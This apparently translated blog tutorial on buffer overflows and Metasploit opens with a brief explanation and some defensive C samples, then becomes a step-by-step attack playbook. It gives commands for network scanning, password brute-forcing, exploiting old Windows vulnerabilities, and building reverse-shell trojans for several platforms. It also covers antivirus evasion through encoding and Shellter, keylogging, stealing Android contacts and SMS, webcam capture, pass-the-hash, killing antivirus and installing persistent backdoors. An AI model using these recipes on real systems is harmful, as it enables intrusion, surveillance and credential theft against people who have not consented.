Network security (9: buffer overflow && metasploit)

A buffer overflow occurs when more data is written into a buffer than it has room to store, like pouring more water into a cup than it can hold.

More abstractly, a buffer can be understood as a readable and writable region of memory; the ultimate goal of the attack is to make the system execute malicious code that the attacker has deliberately placed in that memory.

Defenses against buffer overflows:
use secure string-manipulation functions
write secure code
validate (filter) input data
check pointer integrity
third-party software defenses
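As an added illustration of the first defenses listed above (this is not code from the original notes), the C snippet below shows an unbounded strcpy() beside a bounded, validated copy; the 16-byte buffer and the printable-ASCII filter are assumptions chosen for the example.

```c
#include <stdio.h>
#include <string.h>

#define NAME_LEN 16

/* Vulnerable form: strcpy() copies until it finds a NUL byte and never looks
 * at the destination size, so any input longer than NAME_LEN-1 bytes runs
 * past the stack buffer and overwrites whatever is stored after it. */
void unsafe_greet(const char *input) {
    char name[NAME_LEN];
    strcpy(name, input);                 /* unbounded copy: the overflow */
    printf("hello %s\n", name);
}

/* Hardened form: measure the input without reading past the buffer size,
 * reject anything that does not fit, filter the content, and copy with an
 * explicit bound. Returns 1 if the input was accepted, 0 if rejected. */
int safe_copy(const char *input, char *out, size_t outlen) {
    if (input == NULL || out == NULL || outlen == 0)
        return 0;
    size_t n = 0;
    while (n < outlen && input[n] != '\0')   /* bounded length scan */
        n++;
    if (n == outlen)                         /* no room for the NUL terminator */
        return 0;
    for (size_t i = 0; i < n; i++) {         /* input validation: printable ASCII only */
        unsigned char c = (unsigned char)input[i];
        if (c < 0x20 || c > 0x7e)
            return 0;
    }
    memcpy(out, input, n);
    out[n] = '\0';
    return 1;
}

int main(void) {
    char name[NAME_LEN];
    const char *short_input = "alice";
    const char *long_input = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";  /* 32 bytes: does not fit */
    printf("safe_copy(short) = %d\n", safe_copy(short_input, name, sizeof name));
    printf("safe_copy(long)  = %d\n", safe_copy(long_input, name, sizeof name));
    unsafe_greet(short_input);  /* fine here; long_input would smash the stack */
    return 0;
}
```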


Exploit (penetration attack)
the process in which a tester attacks using a vulnerability in a system, program, or service

Payload (attack load)
the attacker's code that is executed on the target system, for example to open a reverse connection, create a user, or run other system commands

shellcode
a sequence of machine instructions that runs on the target machine and returns a shell after successful execution

Module (module)
a software component used in the Metasploit framework

Listener (listener)
a Metasploit component that waits for an incoming network connection

Start the database: service postgresql start

Check the database state: service postgresql status

Run msfconsole

View the database connection status: db_connect

Create a workspace: workspace -a test

Delete a workspace: workspace -d test

Enter the test workspace: workspace test

Scan a host with nmap: db_nmap -sS 192.168.80.1

Export scan results: db_export 1.xml
Import scan results: db_import 1.xml

View scan results: hosts


Information gathering

Open msfconsole

  1. whois www.example.com
  2. nslookup

use auxiliary/scanner/ip/ipidseq   # IPID sequence scanner, similar to nmap's -O and -sI options
show options
set RHOSTS 192.168.1.0/24
set RPORT 8080
set THREADS 50
run

nmap scan through the database connection
db_nmap -sS -A 192.168.2.123

db_services   view scan results

Use the portscan module
search portscan
use auxiliary/scanner/portscan/syn
set RHOSTS 192.168.1.111
set THREADS 50
run

smb_version specific scanning module:
use auxiliary/scanner/smb/smb_version   (find IPs with port 445 open)
show options
set RHOSTS 192.168.1.111
set THREADS 50
run
db_hosts -c address,os_flavor

Find MSSQL hosts
use auxiliary/scanner/mssql/mssql_ping
show options
set RHOSTS 192.168.1.0/24
set THREADS 255
run

Search a site for e-mail addresses
search search_email_collector
use auxiliary/gather/search_email_collector
set DOMAIN cracer.com   (domain to scan)
run

ssh server scan
use auxiliary/scanner/ssh/ssh_version
set RHOSTS 192.168.1.0/24
set THREADS 50
run

telnet service
use auxiliary/scanner/telnet/telnet_version
set RHOSTS 192.168.1.0/24
set THREADS 50
run

ftp host scan
use auxiliary/scanner/ftp/ftp_version
show options
set RHOSTS 192.168.1.0/24
set THREADS 50
run

Scan for anonymous ftp login
use auxiliary/scanner/ftp/anonymous
show options
set RHOSTS 192.168.1.0/24
set THREADS 50
run

anonymous ftp login
login name: anonymous
password: empty

Scan which hosts on the local network are alive
use auxiliary/scanner/discovery/arp_sweep
show options
set RHOSTS 192.168.1.0/24
set THREADS 50
run

Scan web directories (does not scan files)
use auxiliary/scanner/http/dir_scanner
show options
set RHOSTS 192.168.1.129
set THREADS 50
run

Scan SNMP hosts
use auxiliary/scanner/snmp/snmp_login
show options
set RHOSTS 192.168.1.0/24
set THREADS 50
run

Password sniffer
use auxiliary/sniffer/psnuffle
run


Password brute-forcing

ssh password
search ssh_login
use auxiliary/scanner/ssh/ssh_login
show options
set RHOSTS 192.168.2.231
set PASS_FILE pass
set USERNAME root
exploit

telnet password
search telnet_login
use auxiliary/scanner/telnet/telnet_login
show options
set RHOSTS 192.168.2.123
set PASS_FILE pass
set USERNAME administrator
exploit

samba attack
use auxiliary/scanner/smb/smb_login
set RHOSTS 192.168.2.3
set PASS_FILE pass
set SMBUser administrator
set THREADS 50
exploit

mysql password brute force
search mysql_login
use auxiliary/scanner/mysql/mysql_login
set RHOSTS 192.168.1.32
set PASS_FILE pass
set USERNAME root
set THREADS 50
exploit

postgresql password
search postgresql_login
use auxiliary/scanner/postgres/postgres_login
show options
set RHOSTS 192.168.2.129
set PASS_FILE pass
set USERNAME postgres
exploit

tomcat attack
search tomcat_mgr_login
use auxiliary/scanner/http/tomcat_mgr_login
show options
set RHOSTS 192.168.1.23
set PASS_FILE /root/pass.txt
set USER_FILE /root/user.txt
exploit
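From the defender's side, the login brute-force modules above leave a trail of repeated failed logins in the target's sshd log. The following C example (added here, not part of the original notes) tallies "Failed password" lines per source address over constructed sample log lines and flags any source that reaches a threshold; the log format, the threshold of 3 and the addresses are assumptions made for the example.

```c
#include <string.h>

#define IP_LEN 46
#define THRESHOLD 3   /* failed logins from one source that we flag as brute force */
struct source { char ip[IP_LEN]; int failures; };

/* Constructed sample sshd log lines (not from the page): one source runs a wordlist
 * against root, another source fails once, and one login succeeds. */
static const char *sample_log[] = {
    "Jul 30 10:00:01 srv sshd[2001]: Failed password for root from 192.168.2.50 port 41001 ssh2",
    "Jul 30 10:00:01 srv sshd[2002]: Failed password for root from 192.168.2.50 port 41002 ssh2",
    "Jul 30 10:00:02 srv sshd[2003]: Failed password for admin from 10.0.0.7 port 53000 ssh2",
    "Jul 30 10:00:03 srv sshd[2004]: Accepted password for bob from 10.0.0.8 port 53100 ssh2",
    "Jul 30 10:00:03 srv sshd[2005]: Failed password for root from 192.168.2.50 port 41003 ssh2",
};

/* Extracts <ip> from a "Failed password for <user> from <ip> port ..." line; returns 1
 * and fills ip on success, 0 if the line is not a failed login. */
int parse_failed_source(const char *line, char *ip, size_t iplen) {
    const char *p = strstr(line, "Failed password for ");
    if (p == NULL || (p = strstr(p, " from ")) == NULL) return 0;
    p += strlen(" from ");
    size_t n = strcspn(p, " ");
    if (n == 0 || n >= iplen) return 0;   /* bounded copy: never overrun ip */
    memcpy(ip, p, n);
    ip[n] = '\0';
    return 1;
}

/* Counts failed logins per source address; returns the number of distinct sources. */
int tally_failures(const char **lines, int count, struct source *tab, int tabsize) {
    int used = 0;
    char ip[IP_LEN];
    for (int i = 0; i < count; i++) {
        if (!parse_failed_source(lines[i], ip, sizeof ip)) continue;
        int j = 0;
        while (j < used && strcmp(tab[j].ip, ip) != 0) j++;
        if (j == used) {
            if (used == tabsize) continue;   /* table full: drop, never overflow */
            memcpy(tab[used].ip, ip, sizeof ip);
            tab[used++].failures = 0;
        }
        tab[j].failures++;
    }
    return used;
}

/* Returns the first source with at least THRESHOLD failures, or NULL if none. */
const char *first_bruteforce_source(struct source *tab, int used) {
    for (int i = 0; i < used; i++)
        if (tab[i].failures >= THRESHOLD) return tab[i].ip;
    return NULL;
}
```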


Exploit module

show targets   display targets (OS versions)

set TARGET   set the target version

exploit   start exploiting the vulnerability

sessions -l   list sessions

sessions -i   select a session

sessions -k   kill a session

Ctrl+Z   put the session in the background

Ctrl+C   end the session

show auxiliary   display auxiliary modules

use   select an auxiliary module

set   set options

run   run the module

ms10_002
search ms10_002
use exploit/windows/browser/ms10_002_aurora
show options
set SRVHOST 192.168.2.128   (IP on which the malicious URL is served; can be proxied)
set payload windows/meterpreter/reverse_tcp   (reverse shell)
set SRVPORT 80   (port the malicious page is served on)
set URIPATH /
set LHOST 192.168.2.128   (listening address)
set LPORT 1211   (listening port)
exploit

sessions -l   (check whether there is a session)

sessions -i 1   (select an ID to enter the session)
typing shell in meterpreter drops into a shell directly

ms10_018
search ms10_018
use exploit/windows/browser/ms10_018_ie_behaviors
show options
set SRVHOST 192.168.2.128
set SRVPORT 8081
set payload windows/shell/reverse_tcp
set LHOST 192.168.2.128
set LPORT 1211
exploit

sessions -l   (check whether there is a session)

sessions -i 1   (select an ID to enter the session)

Because the payload is different, this one enters a shell directly

ms12_020
search ms12_020
use auxiliary/scanner/rdp/ms12_020_check   (check for the ms12_020 vulnerability)
show options
set RHOSTS 192.168.2.0/24
set THREADS 50
run

back

use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
show options
set RHOST 192.168.2.132
run

ms10_046
search ms10_046
use exploit/windows/browser/ms10_046_shortcut_icon_dllloader
show options
set SRVHOST 192.168.2.128
set payload windows/shell/reverse_tcp
set LHOST 192.168.2.128
set LPORT 1213
exploit

ms08_067
search ms08_067
use exploit/windows/smb/ms08_067_netapi
show options
set RHOST 192.168.2.131
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.2.128
set LPORT 1215
show targets
set target 34
exploit


shellcode

windows

Generate the shellcode
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.2.133 LPORT=1121 X > /root/cracer.exe

Listen for the shellcode
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.2.133   (address must match)
set LPORT 1121

Upload the generated shellcode to the target machine

exploit

linux

Generate the shellcode
msfpayload linux/x86/meterpreter/reverse_tcp LHOST=192.168.2.133 LPORT=1121 X > /root/cracer


Listen for the shellcode
msfconsole
use exploit/multi/handler
set payload linux/x86/meterpreter/reverse_tcp   (must match the payload that was generated)
set LHOST 192.168.2.133   (address must match)
set LPORT 1121

Upload the generated shellcode to the target machine

exploit

android

Generate the shellcode
msfpayload android/meterpreter/reverse_tcp LHOST=192.168.2.133 LPORT=1121 X > /root/Desktop/cracer.apk


Listen for the shellcode
msfconsole
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp   (must match the payload that was generated)
set LHOST 192.168.2.133   (address must match)
set LPORT 1121

Upload the generated shellcode to the target machine

exploit

dump_contacts    export contacts
dump_sms         export SMS messages
webcam_list      number of cameras
-i 1             select camera 1 (rear camera)
webcam_snap      take a photo
webcam_stream    start the camera stream

java

Generate the shellcode
msfpayload java/meterpreter/reverse_tcp LHOST=192.168.2.133 LPORT=1125 X > /root/Desktop/cracer.jar


Listen for the shellcode
msfconsole
use exploit/multi/handler
set payload java/meterpreter/reverse_tcp
set LHOST 192.168.2.133   (address must match)
set LPORT 1125

Upload the generated shellcode to the target machine

exploit

Run the generated cracer.jar:
	java -jar cracer.jar

php

Generate the shellcode
msfpayload php/meterpreter/reverse_tcp LHOST=192.168.2.133 LPORT=1121 R > cracer.php


Listen for the shellcode
msfconsole
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set LHOST 192.168.2.133   (address must match)
set LPORT 1121

Upload the generated shellcode to the target machine

exploit

Shell AV evasion (免杀)

Multiple encoding for AV evasion
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.2.133 LPORT=1211 R | msfencode -e x86/shikata_ga_nai -c 5 -t raw | msfencode -e x86/alpha_upper -c 2 -t raw | msfencode -e x86/shikata_ga_nai -c 5 -t raw | msfencode -e x86/countdown -c 5 -t exe -o /root/cc.exe

Packer AV evasion
upx -5 cc.exe

Veil AV evasion

Shellter AV evasion tool
a shellcode injection tool
injects the shellcode into an otherwise normal program to achieve AV evasion

  1. First, generate the Metasploit payload
    msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.3 LPORT=1337 -e x86/shikata_ga_nai -i 43 -f raw -o fud.raw
  2. Run shellter under wine: wine shellter.exe
  3. A stands for automatic mode; for the PE target, give the location of the exe file that the payload will be injected into for AV evasion
  4. Enter L to open the payload list; we use meterpreter_reverse_tcp, so enter 1
  5. Enter the reverse-shell address, then the local port to listen on (1355 is chosen here as the listening port), and press Enter to generate
  6. Start the Metasploit listener
    msfconsole
    use exploit/multi/handler
    set payload windows/meterpreter/reverse_tcp
    set lhost 192.168.1.3
    set lport 1355
    exploit
  7. After the listener is started, place the generated file on the Windows machine and run it

Post-exploitation

1. Create a trojan
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.2.133 LPORT=1121 X > /root/cracer.exe
2. Listen
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.2.133
set LPORT 1233
exploit
Execute the trojan on the target machine

  1. Operating commands

screenshot   take a screen capture; the picture is saved to the home folder

sysinfo   get the system platform

Keylogger
keyscan_start   start
keyscan_dump    output
keyscan_stop    stop

ps   list processes

migrate 1774   migrate to another process (after a successful intrusion, the first thing to do on the target is to migrate to a stable process, so that control is kept even if the original program is closed)

run post/windows/capture/keylog_recorder   record keystrokes

Get hashes ---- hashdump

Log in using the hash
use exploit/windows/smb/psexec
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.2.133
set RHOST 192.168.2.131   (target)
show options
set LPORT 1212
set SMBUser Administrator   (the hash obtained above supplies the SMBUser and SMBPass values)
set SMBPass asdasdqwsda1313
show options
exploit

Process migration: run post/windows/manage/migrate   (migrate to a stable process automatically)
run killav   (stop antivirus processes)
view all target traffic: run packetrecorder -i 1
extract system information: run scraper

Persistent control of the PC (autostart on boot)
run persistence -X -i 50 -p 1121 -r 192.168.2.133   (writes registry data on the target)

msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LPORT 1121
set LHOST 192.168.2.133
exploit
sessions -u 2   upgrade the shell to meterpreter

Permanent control of the server

msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.2.133 LPORT=1127 X > /root/cracer.exe
generate the payload and run it on the target machine

msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LPORT 1121
set LHOST 192.168.2.133
exploit

Run the payload

run metsvc -A   // install the permanent backdoor

After the restart
msfconsole
use exploit/multi/handler
set payload windows/metsvc_bind_tcp
set RHOST 192.168.2.132
set LPORT 31337   // fixed port
exploit

Origin blog.csdn.net/Aidang/article/details/97888442